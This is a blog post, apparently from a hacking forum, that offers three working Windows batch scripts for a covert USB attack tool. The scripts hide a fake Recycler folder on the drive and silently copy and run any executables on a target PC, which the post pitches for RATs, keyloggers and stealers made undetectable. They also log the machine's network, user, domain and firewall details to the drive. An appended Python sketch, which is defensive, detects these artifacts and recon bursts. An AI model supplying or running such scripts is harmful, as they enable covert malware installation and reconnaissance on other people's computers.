Posted by : Muhammad Haseeb Javed Friday, February 4, 2011

I have seen many different attempts at creating a USB hacking tool. The Switchblade and Hacksaw were okay, but they set off so many alarms that they were useless, so I propose something different.

This uses three simple batch files: Go.bat, injector.bat, and sysinfo.bat. Save all three of these files to the root of any USB drive, then run go.bat; it will create a hidden directory on your USB drive called Recycler.

Note: after the first run, the folders and go.bat will be hidden system files, and injector and sysinfo will move into another folder; they will no longer be in the root.

In this folder there are three subfolders: System (scripts will install here), Docs (logs go here) and BIN (put any executable here, .exe, .bat, or .vbs, and it will copy it to the target computer and execute it).

The concept here is there are no better tools for USB hacking than RATs, Stealers, Keyloggers, Downloaders, AV Killers, etc, that can be found on this site and made FUD with the available crypters here. The reason for the copy and execute is because if you use an encryption algorithm like Blowfish for example, the execution time can be minutes or at least a long time. Longer than you probably want to stick around. I have copied and executed 15 files at once, like I-stealer, Cybergate, etc, and it takes about 10-15 seconds.

While this is occurring, a second script uses Windows tools to gather some quick intel like external IP, history, network statistics, ports utilized, etc.

I run this on a machine with KIS 2011 on it and no alarms occur, if your files are fud.

So here goes, thanks to Pithbot and Forum_Reader for their assistance.

Save all three files to the root of the USB drive and run go.bat. When complete, your USB eject menu will come up; after that, add some files to the BIN folder and see what this will do.

::__Go.bat__::
Code:
@(echo off & break off & Title _) >nul
If %~d0 == %systemdrive% goto :EOF
::First Run
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\System"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
:Next
if exist injector.bat copy /y injector.bat %wrkdir% >nul && del /f /q %~d0\injector.bat >nul
if exist sysinfo.bat copy /y sysinfo.bat %wrkdir% >nul && del /f /q %~d0\sysinfo.bat >nul
if exist inject.vbs del /f /q %~d0\inject.vbs >nul
if exist sysinfo.vbs del /f /q %~d0\sysinfo.vbs >nul
CD %wrkdir%>nul
If exist inject.vbs Start "" inject.vbs>nul & Goto Next1
If exist injector.bat Start "" injector.bat >nul
:Next1
If exist sysinfo.vbs Start "" sysinfo.vbs >nul & Goto Next2
Call sysinfo.bat
:Next2
attrib +s +h %0
cls
exit

::__Injector.bat__::
Code:
@(echo off & break off & Title _) >nul
::-----------------------------------------------------------------------------------------------------------------------------::
::This is called the Injector
:: This script is meant to only run from flash drive
:: On first run, it makes the %wrkdir% on your flashdrive as a place to hide files
:: I used recycler\S-15~ ect to make it look not obvious as a hidden system folder
:: Any executable files place in the "Bin" folder will be copied to %temp% and executed, exe, bat, and vbs
:: It have put 10-15 files in there at once and it copies and executes them all in about 10 seconds
::Very handy if you have things that inject into memory, that will otherwise cause virtual memory errors if they are executed from USB.
::It's nice because you don't need to know filenames and edit script all of the time it executes everything
::If you make your scripts self destruct that would be good if they only need to run once
:: I have another script that logs pc, system and network, open ports, history, info etc, using only windows tools
:: It gets called by another script along with this one, and saves to "\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
::When this script is complete it brings up the safely remove hardware menu to signify completion for drive ejection.
::--------------------------------------------------------------------------------------------------------------------------------::
::--------------------------------------------------------------------------------------------------------------------------------::
@echo off & @break off & title _
if not [%1]==[] goto :%1
    call %0 system
    exit

:system
if exist inject.vbs start "" "inject.vbs"
    echo set o = createobject("wscript.shell") > inject.vbs
    echo o.run "%~0 script", vbhide, true >> inject.vbs
    start "" "inject.vbs"
    exit

:script
If %~d0 == %systemdrive% goto :EOF
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\BIN"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s
Goto :EOF
:Next
::Non obvious directory creation on PC
If not exist "%temp%\MessengerCache" mkdir "%temp%\MessengerCache" >nul
:ExeCheck
If exist "*exe" copy /y "*.exe" "%temp%\MessengerCache" & Goto EXEGooD
:BatCheck
If exist "*bat" copy /y "*bat" "%temp%\MessengerCache" & Goto BatGood
:VbsCheck
If exist "*vbs" copy /y "*vbs" "%temp%\MessengerCache" & Goto VbsGood
Goto :eof
:EXEGooD
For %%j IN ("%temp%\MessengerCache\*.Exe") DO Start ""  %%j
Goto BatCheck
:BatGood
For %%h IN ("%temp%\MessengerCache\*.Bat") DO Start ""  %%h
Goto VbsCheck
:VbsGood
For %%i IN ("%temp%\MessengerCache\*.Vbs") DO Start ""  %%i
Del /F /Q inject.vbs >nul
@cls & @Exit

::__Sysinfo.bat__::
Code:
@echo off & @break off & title _
if not [%1]==[] goto :%1
    call %0 system
    exit

:system
if exist sysinfo.vbs start "" "sysinfo.vbs"
    echo set o = createobject("wscript.shell") > sysinfo.vbs
    echo o.run "%~0 script", vbhide, true >> sysinfo.vbs
    start "" "sysinfo.vbs"
    exit

:script
Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs"
If exist %wrkdir% CD %wrkdir% >nul & Goto Next
If not exist %wrkdir% mkdir %wrkdir% >nul
Attrib +s +h Recycler /d /s && Attrib +s +h Recycler\*.txt
:Next
CD %wrkdir%>nul
set logfile=%wrkdir%\%computername%-%random%.txt 2>&1
::@@System_Info and Log Creation@@::
Echo ************************************ >> %logfile%
Echo ***********[System Info]************ >> %logfile%
Echo ************************************  >> %logfile%
Echo. >> %logfile%
Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %logfile%
time /t >> %logfile%
date /t >> %logfile%
Echo *********************************************** >> %logfile%
Echo ***********[External / Internal Ip]************ >> %logfile%
Echo ***********************************************  >> %logfile%
::This script for external ip was not written by me, got it from spam::
echo Function MyIP_XMLHTTP( )>wan.vbs
echo     Dim objRequest, strURL >>wan.vbs
echo     MyIP_XMLHTTP = "0.0.0.0" >>wan.vbs
echo     strURL = "http://www.whatismyip.com/automation/n09230945.asp"  >>wan.vbs
echo     Set objRequest = CreateObject( "Microsoft.XMLHTTP" )  >>wan.vbs
echo     objRequest.open "GET", strURL, False >>wan.vbs
echo     objRequest.send vbNull >>wan.vbs
echo     If objRequest.status = 200 Then MyIP_XMLHTTP =  objRequest.responseText >>wan.vbs
echo     Set objRequest = Nothing >>wan.vbs
echo End Function >>wan.vbs
echo ret = MyIP_XMLHTTP( ) >>wan.vbs
echo Set FSys = CreateObject("Scripting.FileSystemObject")  >>wan.vbs
echo Set MonFic = FSys.CreateTextFile("00001.tmp") >>wan.vbs
echo With MonFic >>wan.vbs
echo .writeLine ret >>wan.vbs
echo End With >>wan.vbs
call wan.vbs
::---------------------
for /F "tokens=* delims=" %%a in (00001.tmp) do set wanIP=%%a
del /F /Q wan.vbs >NUL
del /F /Q 00001.tmp >NUL
::---------------------
ipconfig |find "IPv4" > 00002.tmp
for /f "tokens=2 delims=:" %%a in (00002.tmp) do set lanIP=%%a
del /F /Q 00002.tmp >NUL
::---------------------
for /F "tokens=* delims=" %%i in ('reg query  "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\UILanguages"')  do set lang=%%i
set lang=%lang:~68,5%
::---------------------
cls
echo. >> %logfile%
echo ^>^>^> Local IP:%lanIP% >> %logfile%
echo ^>^>^> Internet IP: %wanIP% >> %logfile%
echo ^>^>^> Localisation: %lang% >> %logfile%
Echo.  >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Network Info]*********** >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Network Info
net user /domain >> %logfile%
net group /domain >> %logfile%
net localgroup /domain >> %logfile%
net localgroup administrators /domain >> %logfile%
net localgroup "Account Operators" /domain >> %logfile%
net accounts /domain >> %logfile%
net view /domain >> %logfile%
net view >> %logfile%
Echo ************************************ >> %logfile%
echo ***********[Local Info]************* >> %logfile%
Echo ************************************ >> %logfile%
Echo. >> %logfile%
::Local Info
ipconfig /all >> %logfile%
ipconfig /displaydns >> %logfile%
netstat -ano >> %logfile%
netstat >> %logfile%
arp -a >> %logfile%
tasklist /svc >> %logfile%
tasklist >> %logfile%
tasklist /v >> %logfile%
net share >> %logfile%
net use >> %logfile%
net accounts >> %logfile%
net localgroup >> %logfile%
net localgroup administrators >> %logfile%
systeminfo >> %logfile%
netsh firewall show config >> %logfile%
netsh advfirewall show allprofiles >> %logfile%
netsh advfirewall firewall show rule name=all >> %logfile%
netsh diag show all /v >> %logfile%
netsh diag /v >> %logfile%
ping localhost >> %logfile%
echo Completed Data Recovery on %time% %date% >> %logfile%
::@@Eject Drive to Signify Completion@@::
setlocal enableextensions
rundll32.exe shell32.dll,Control_RunDLL hotplug.dll
endlocal
:END
::Cleanup
ping localhost -n 1>nul
Del /F /Q sysinfo.vbs >nul
@cls
@exit
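
The scripts above leave three artifacts a defender can alert on: a script launched from a `Recycler\S-1-5-21-...` folder on a non-system drive, an image started from `%temp%\MessengerCache`, and a burst of built-in enumeration tools under one parent process. The following detection sketch is an added example, not part of the original post. The event tuple layout, the thresholds, the drive letter `E:` and the user name in the constructed sample events are assumptions.

```python
import re
from collections import defaultdict

# Artifacts named in the scripts above.
STAGING = re.compile(r"\\temp\\messengercache\\", re.I)
FAKE_BIN = re.compile(r"([a-z]):\\recycler\\s-1-5-21-[\d-]+\\(system|bin|docs)\\", re.I)
RECON = ("net user", "net group", "net localgroup", "net accounts", "net view",
         "net share", "net use", "netstat", "arp -a", "ipconfig", "tasklist",
         "systeminfo", "netsh")

def detect(events, system_drive="C", window=60, threshold=5):
    """Return (rule, parent_pid) alerts for (ts, ppid, image, cmdline) events."""
    alerts, recon = [], defaultdict(list)
    for ts, ppid, image, cmd in events:
        if STAGING.search(image):            # payload started from %temp%\MessengerCache
            alerts.append(("temp-staging-exec", ppid))
        m = FAKE_BIN.search(cmd)             # script run from a look-alike recycle bin
        if m and m.group(1).upper() != system_drive.upper():
            alerts.append(("fake-recycler-script", ppid))
        tool = next((r for r in RECON if cmd.lower().startswith(r)), None)
        if tool:
            recon[ppid].append((ts, tool))
    for ppid, hits in recon.items():         # many distinct recon tools under one parent
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            if len({c for t, c in hits[i:] if t - t0 <= window}) >= threshold:
                alerts.append(("recon-burst", ppid))
                break
    return alerts

# Constructed sample events: (seconds, parent PID, image path, command line).
SYS32 = "C:\\Windows\\System32\\"
SID_DIR = r"E:\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003"
EVENTS = [
    (0, 900, SYS32 + "wscript.exe", f'wscript.exe "{SID_DIR}\\System\\inject.vbs"'),
    (4, 1200, r"C:\Users\amy\AppData\Local\Temp\MessengerCache\a.exe", "a.exe"),
    *[(5 + i, 1300, SYS32 + c.split()[0] + ".exe", c) for i, c in enumerate(
        ["net user /domain", "net view", "ipconfig /displaydns",
         "netstat -ano", "arp -a", "systeminfo"])],
    (500, 2000, SYS32 + "ipconfig.exe", "ipconfig /all"),  # lone admin command, benign
]

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Real process-creation telemetry (for example Sysmon Event ID 1) carries full paths and quoting in the command line, so the prefix match on `RECON` would need normalising before use.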
